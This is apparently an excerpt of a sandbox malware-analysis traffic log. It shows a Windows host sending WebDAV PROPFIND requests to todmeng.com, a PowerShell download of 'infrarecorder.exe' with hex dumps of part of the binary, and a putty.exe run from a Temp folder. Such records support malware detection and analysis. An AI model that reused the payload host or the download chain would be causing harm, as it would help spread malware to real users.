2024-12-13 15:43:31 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:32 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:31 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:32 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.3	49797	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:33 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:34 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:33 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:34 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.3	49799	185.147.125.51	443	6152	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:35 UTC	180	OUT	GET /webdav/infrarecorder.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 Host: todmeng.com Connection: Keep-Alive
2024-12-13 15:43:35 UTC	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:35 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Thu, 12 Dec 2024 19:29:50 GMT ETag: "2aa108-62917bcdf4780" Accept-Ranges: bytes Content-Length: 2793736 Connection: close Content-Type: application/x-msdos-program
2024-12-13 15:43:35 UTC	7919	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 9d 2c ac d1 fc 42 ff d1 fc 42 ff d1 fc 42 ff be 8a dc ff f4 fc 42 ff be 8a e8 ff 67 fc 42 ff d8 84 c1 ff d4 fc 42 ff be 8a ed ff 92 fc 42 ff d8 84 d1 ff c8 fc 42 ff d1 fc 43 ff 57 fd 42 ff d8 84 c6 ff d0 fc 42 ff be 8a e9 ff 67 fc 42 ff be 8a d8 ff d0 fc 42 ff be 8a df ff d0 fc 42 ff 52 69 63 68 d1 fc 42 ff 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed 40 42 50 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,BBBBgBBBBCWBBgBBBRichBPEL@BP
2024-12-13 15:43:35 UTC	8000	IN	Data Raw: cc 55 8b ec 6a ff 68 6b ad 4b 00 64 a1 00 00 00 00 50 81 ec 2c 02 00 00 a1 10 d3 4e 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 45 10 8b 75 08 8b 4d 0c 33 ff 89 bd c8 fd ff ff 3b c7 75 05 b8 58 ca 4c 00 83 79 14 08 72 02 8b 09 8d 95 e8 fd ff ff 52 57 50 51 ff 15 1c d1 4b 00 33 c0 66 89 85 cc fd ff ff 8d 85 e8 fd ff ff c7 85 e0 fd ff ff 07 00 00 00 89 bd dc fd ff ff 8d 50 02 66 8b 08 83 c0 02 66 3b cf 75 f5 2b c2 d1 f8 50 8d 8d e8 fd ff ff 51 8d 8d cc fd ff ff e8 5d f0 ff ff 89 7d fc 6a ff 8d 4e 04 c7 06 ff ff ff ff 57 8d 85 cc fd ff ff 33 d2 c7 41 14 07 00 00 00 89 79 10 50 66 89 11 e8 c3 eb ff ff 83 bd e0 fd ff ff 08 72 0f 8b 8d cc fd ff ff 51 e8 8a 59 09 00 83 c4 04 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd e8 67 65 09 00 Data Ascii: UjhkKdP,N3EVWPEdEuM3;uXLyrRWPQK3fPff;u+PQ]}jNW3AyPfrQYMdY_^M3ge
2024-12-13 15:43:35 UTC	8000	IN	Data Raw: 59 14 52 8b ce c6 46 14 00 e8 13 b3 00 00 8b 0e 8b 55 08 80 79 15 00 75 13 8b 41 08 38 58 14 75 1e 8b 01 38 58 14 75 17 c6 41 14 00 8b 4a 04 8b fe 8b 76 04 3b 79 04 0f 85 44 ff ff ff eb 32 8b 01 38 58 14 75 15 8b 41 08 88 58 14 52 c6 41 14 00 e8 ab f2 01 00 8b 0e 8b 55 08 8a 46 14 88 41 14 88 5e 14 8b 09 88 59 14 52 8b ce e8 b0 b2 00 00 88 5f 14 8b 55 fc 52 e8 b0 3a 09 00 8b 4d 08 8b 41 08 83 c4 04 5f 5e 5b 85 c0 74 04 48 89 41 08 8b 4d 10 8b 45 0c 89 08 8b e5 5d c2 0c 00 cc cc 55 8b ec 51 8b 55 10 8b c2 56 c7 45 fc 00 00 00 00 8d 70 02 66 8b 08 83 c0 02 66 85 c9 75 f5 8b 4d 0c 2b c6 d1 f8 50 52 e8 53 01 00 00 8b 75 08 33 c9 c7 46 14 07 00 00 00 c7 46 10 00 00 00 00 66 89 0e 50 8b ce e8 d5 ec ff ff 8b c6 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: YRFUyuA8Xu8XuAJv;yD28XuAXRAUFA^YR_UR:MA_^[tHAME]UQUVEpffuM+PRSu3FFfP^]
2024-12-13 15:43:35 UTC	8000	IN	Data Raw: cc 55 8b ec 8b 45 10 83 ec 08 80 78 0e 00 74 0a 68 74 cb 4c 00 e8 2c 10 09 00 53 56 8b d8 57 8d 45 10 89 5d fc e8 c7 04 00 00 8b 0b 80 79 0e 00 74 05 8b 7b 08 eb 17 8b 43 08 80 78 0e 00 74 04 8b f9 eb 0a 8b 45 10 8b 78 08 3b c3 75 7c 80 7f 0e 00 8b 73 04 75 03 89 77 04 8b 55 08 8b 42 04 39 58 04 75 05 89 78 04 eb 0b 39 1e 75 04 89 3e eb 03 89 7e 08 8b 42 04 39 18 75 24 80 7f 0e 00 74 04 8b ce eb 15 8b 07 80 78 0e 00 8b cf 75 0b 90 8b c8 8b 01 80 78 0e 00 74 f6 8b 42 04 89 08 8b 4a 04 89 4d f8 39 59 08 75 7c 80 7f 0e 00 74 07 8b c6 89 41 08 eb 6f 8b c7 e8 72 02 00 00 8b 4d f8 8b 55 08 89 41 08 eb 5d 89 41 04 8b 0b 89 08 3b 43 08 75 04 8b f0 eb 1a 80 7f 0e 00 8b 70 04 75 03 89 77 04 89 3e 8b 4b 08 89 48 08 8b 53 08 89 42 04 8b 4d 08 8b 49 04 39 59 04 75 05 Data Ascii: UExthtL,SVWE]yt{CxtEx;u\|suwUB9Xux9u>~B9u$txuxtBJM9Yu\|tAorMUA]A;Cupuw>KHSBMI9Yu
2024-12-13 15:43:35 UTC	8000	IN	Data Raw: 6f f8 ff ff 88 85 74 f8 ff ff 8b c2 c1 e8 10 25 ff 00 00 00 c1 e9 10 88 95 6e f8 ff ff 88 95 75 f8 ff ff c1 ea 18 88 95 71 f8 ff ff 88 95 72 f8 ff ff 8b 55 1c c7 85 48 f8 ff ff 01 00 00 01 c7 85 4c f8 ff ff 01 00 00 01 c7 85 50 f8 ff ff 00 08 08 00 88 8d 65 f8 ff ff 88 85 70 f8 ff ff 88 85 73 f8 ff ff 88 95 76 f8 ff ff 0f b6 4b 10 8b c2 c1 e8 08 25 ff 00 00 00 88 85 77 f8 ff ff 88 85 7c f8 ff ff 8b c2 c1 e8 10 25 ff 00 00 00 88 85 78 f8 ff ff 88 85 7b f8 ff ff 0f b6 43 14 fe c1 88 95 7d f8 ff ff c1 ea 18 83 3b 3b 88 85 7e f8 ff ff 0f b6 43 08 88 8d 7f f8 ff ff 0f b6 4b 04 88 95 79 f8 ff ff 88 95 7a f8 ff ff 8a 53 0c c7 85 88 f8 ff ff 01 00 00 01 88 95 80 f8 ff ff 88 85 81 f8 ff ff 88 8d 82 f8 ff ff 7e 09 c6 85 83 f8 ff ff 3b eb 08 8a 13 88 95 83 f8 ff ff Data Ascii: ot%nuqrUHLPepsvK%w\|%x{C};;~CKyzS~;
2024-12-13 15:43:36 UTC	8000	IN	Data Raw: 08 8b 40 04 83 c0 04 80 38 00 74 04 0c ff eb 0d 83 78 04 03 0f 94 c0 fe c8 24 09 fe c8 0f b6 c8 8b 45 14 3b c1 0f 8f ad 00 00 00 8b 7d 0c 40 89 45 f0 8d 45 ec 89 55 ec e8 34 1a 00 00 e9 96 00 00 00 a8 02 0f 85 8e 00 00 00 8b 45 08 8b 48 04 83 39 04 74 2b 8b 01 83 f8 02 74 24 83 f8 03 74 1f 83 f8 04 74 1a 83 f8 05 74 15 83 7a 5c 00 77 09 81 7a 58 00 f8 ff ff 76 06 83 79 08 02 75 58 8b 4d 08 57 52 8b d3 e8 35 fd ff ff 8b 0f 8b 11 8b 42 14 ff d0 84 c0 75 51 8b 0e 33 ff 88 45 fb 39 b9 f0 00 00 00 76 30 eb 07 8d a4 24 00 00 00 00 be 00 08 00 00 8b 13 8b 52 04 6a 01 8d 45 fb 50 8b cb ff d2 4e 75 ee 8b 45 f4 8b 08 47 3b b9 f0 00 00 00 72 db 8b f0 8b 55 10 83 c6 04 89 75 f4 3b 72 08 0f 85 f7 fe ff ff 5f 5e 8b e5 5d c2 14 00 cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: @8tx$E;}@EEU4EH9t+t$tttz\wzXvyuXMWR5BuQ3E9v0$RjEPNuEG;rUu;r_^]
2024-12-13 15:43:36 UTC	8000	IN	Data Raw: 8b 41 3c 2b 02 8b 7d 0c 8b 5d 10 d1 f8 99 03 f8 13 da eb 36 83 fa 01 75 19 f6 c3 02 75 18 8b 51 10 2b 02 8b 7d 0c 8b 5d 10 d1 f8 99 03 f8 13 da eb 18 85 d2 74 0e 8b 3d f0 9a 4c 00 8b 1d f4 9a 4c 00 eb 06 8b 5d 10 8b 7d 0c 85 db 0f 8c 1d 01 00 00 7f 08 85 ff 0f 82 13 01 00 00 8b 41 10 8b 30 8b 41 3c 2b c6 d1 f8 99 3b da 0f 8f fe 00 00 00 7c 08 3b f8 0f 87 f4 00 00 00 2b 75 fc 8b 41 30 d1 fe 03 f7 29 30 8b 41 20 8d 14 36 01 10 f6 45 18 02 0f 84 e2 00 00 00 8b 41 24 8b 00 85 c0 0f 84 d5 00 00 00 8b 71 34 8b 51 20 8b 36 8b 12 8d 04 70 8b 71 24 89 16 8b 49 34 2b c2 d1 f8 89 01 e9 b5 00 00 00 f6 c3 02 0f 84 94 00 00 00 8b 02 89 45 18 85 c0 0f 84 87 00 00 00 8b 55 14 83 fa 02 75 17 8b 51 10 8b 41 3c 2b 02 8b 7d 0c 8b 5d 10 d1 f8 99 03 f8 13 da eb 31 83 fa 01 75 Data Ascii: A<+}]6uuQ+}]t=LL]}A0A<+;\|;+uA0)0A 6EA$q4Q 6pq$I4+EUuQA<+}]1u
2024-12-13 15:43:36 UTC	8000	IN	Data Raw: 00 83 c4 0c 39 43 14 72 02 8b 1b 39 46 14 72 04 8b 06 eb 02 8b c6 8b 4d fc 8d 14 09 52 8d 04 78 53 50 e8 0a a0 08 00 e9 b3 00 00 00 8b 55 08 39 55 fc 77 55 83 f8 08 72 04 8b 0e eb 02 8b ce 83 f8 08 72 04 8b 06 eb 02 8b c6 8b 5d fc 53 51 8d 0c 78 51 e8 79 29 ff ff 8b 46 14 83 c4 0c 83 f8 08 72 04 8b 0e eb 02 8b ce 83 f8 08 72 04 8b 06 eb 02 8b c6 8b 55 f8 52 8b 55 08 03 d7 8d 0c 51 03 fb 51 8d 14 78 52 eb 51 83 f8 08 72 04 8b 0e eb 02 8b ce 83 f8 08 72 04 8b 06 eb 02 8b c6 8b 5d f8 53 8b 5d fc 03 d7 8d 0c 51 8d 14 1f 51 8d 04 50 50 e8 19 29 ff ff 8b 46 14 83 c4 0c 83 f8 08 72 04 8b 0e eb 02 8b ce 83 f8 08 72 04 8b 06 eb 02 8b c6 53 51 8d 0c 78 51 e8 f2 28 ff ff 8b 4d f4 83 c4 0c 83 7e 14 08 5f 89 4e 10 5b 72 10 8b 06 33 d2 66 89 14 48 8b c6 8b e5 5d c2 08 Data Ascii: 9Cr9FrMRxSPU9UwUrr]SQxQy)FrrURUQQxRQrr]S]QQPP)FrrSQxQ(M~_N[r3fH]
2024-12-13 15:43:36 UTC	8000	IN	Data Raw: f0 40 66 8b 4c 45 dc 66 89 4c 75 bc 46 83 fe 10 72 df 53 6a 00 57 e8 66 8d 08 00 83 c4 0c c6 07 08 33 c0 5e 8a 54 45 bc 88 54 07 01 40 83 f8 10 72 f2 8b 4d fc 33 cd c6 44 3b ff 11 e8 65 8b 08 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 8d 50 02 8d a4 24 00 00 00 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 57 8b f8 83 f8 7f 72 05 bf 7f 00 00 00 8b 45 08 80 b8 d4 09 00 00 00 0f 94 c2 8d 14 d5 08 00 00 00 80 fa 08 74 0d 80 fa 10 74 08 83 c8 ff 5f 5d c2 08 00 33 c9 88 16 b8 01 00 00 00 85 ff 74 21 53 80 fa 10 75 0b 8b 5d 0c 8a 5c 4b 01 88 1c 30 40 8b 5d 0c 8a 1c 4b 88 1c 30 41 40 3b cf 72 e1 5b 5f 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 53 56 57 68 00 02 00 00 8b d9 6a 00 53 e8 8e 8c 08 00 83 c4 0c 8d 83 84 01 00 00 33 d2 e8 Data Ascii: @fLEfLuFrSjWf3^TET@rM3D;e]UEP$ffu+WrEtt_]3t!Su]\K0@]K0A@;r[_]SVWhjS3
2024-12-13 15:43:36 UTC	8000	IN	Data Raw: 8b 51 28 89 55 bc 8b 41 20 83 e8 00 0f 84 3e 01 00 00 48 74 45 48 0f 85 3c 01 00 00 c6 45 b5 04 83 79 14 08 72 02 8b 09 8d 45 b8 50 e8 60 fc ff ff 84 c0 0f 85 1f 01 00 00 68 c8 13 4d 00 8d 8d 2c ff ff ff e8 68 0b ff ff 68 94 2d 4e 00 8d 8d 2c ff ff ff 51 e8 1b 6c 08 00 83 79 14 08 72 02 8b 09 33 d2 8b c1 c7 45 e8 07 00 00 00 c7 45 e4 00 00 00 00 66 89 55 d4 8d 70 02 8d 9b 00 00 00 00 66 8b 10 83 c0 02 66 85 d2 75 f5 2b c6 d1 f8 50 51 8d 4d d4 e8 67 f6 fe ff 8d 45 d4 50 c7 45 fc 00 00 00 00 e8 87 04 ff ff 83 c4 04 c7 45 fc ff ff ff ff 83 7d e8 08 8b f0 8b fa 72 0c 8b 4d d4 51 e8 a6 5f 08 00 83 c4 04 33 d2 c7 45 e8 07 00 00 00 c7 45 e4 00 00 00 00 66 89 55 d4 81 fe 00 c0 12 00 75 04 85 ff 74 57 81 fe 00 80 16 00 75 04 85 ff 74 3c 81 fe 00 00 2d 00 75 04 85 Data Ascii: Q(UA >HtEH<EyrEP`hM,hh-N,Qlyr3EEfUpffu+PQMgEPEE}rMQ_3EEfUutWut<-u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.3	49804	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:36 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:36 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:36 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:36 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.3	49810	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:38 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:38 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:38 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:38 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.3	49816	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:40 UTC	175	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:41 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:40 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:41 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.3	49840	172.67.207.38	443	2568	C:\Users\user\AppData\Local\Temp\putty.exe

Timestamp	Bytes transferred	Direction	Data
